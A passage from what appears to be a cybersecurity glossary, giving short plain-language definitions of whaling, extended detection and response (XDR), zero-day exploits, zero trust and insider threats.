Whaling is a type of phishing attack in which threat actors target senior executives by posing as a legitimate business or partner. In this type of attack, hackers commonly target C-level executives to initiate a wire transfer or obtain sensitive information. Hackers exploit victims by sending emails that contain phishing links or malicious attachments. Whaling is often highly targeted and uses personal information about the intended victim to tailor attacks, making them more effective than traditional phishing campaigns.

XDR (Extended Detection and Response), is a cross-layered cybersecurity tool used by organizations to enhance the security posture of their entire infrastructure. With greater oversight and visibility of data across a multitude of sources, XDR enables organizations to better identify and respond to cybersecurity threats in a more streamlined fashion. XDR makes it possible to achieve a birds-eye view of your cybersecurity posture, while lessening the manual burden placed on cybersecurity personnel to ensure airtight security. An effective XDR strategy enhances the detection and response capabilities of your organization which is crucial in order to minimize security lapses between your cybersecurity solutions.

A zero day exploit is a method used by hackers to perform a cyberattack through a security vulnerability. Zero-day exploits take advantage of new software patches or undisclosed security risks to steal sensitive information or damage computer systems. These types of exploits require prompt remediation, since you essentially have “zero days” to patch the exposed security vulnerabilities.

A zero trust security model is predicated on the idea that networks need to be protected from both external and internal threats. While historically, organizations have put most of their cybersecurity efforts into thwarting attacks from individuals outside the company, the zero trust model proposes that effective cybersecurity means verifying and authenticating all individuals that interact with sensitive information.

Insider threats have steadily increased in recent years, which is why many organizations are now continuously monitoring access privileges and ensuring only users have access to the systems they need. Maintaining strict access controls helps improve the security posture of your organization and protects against all threats, whether they be inside or outside your perimeters.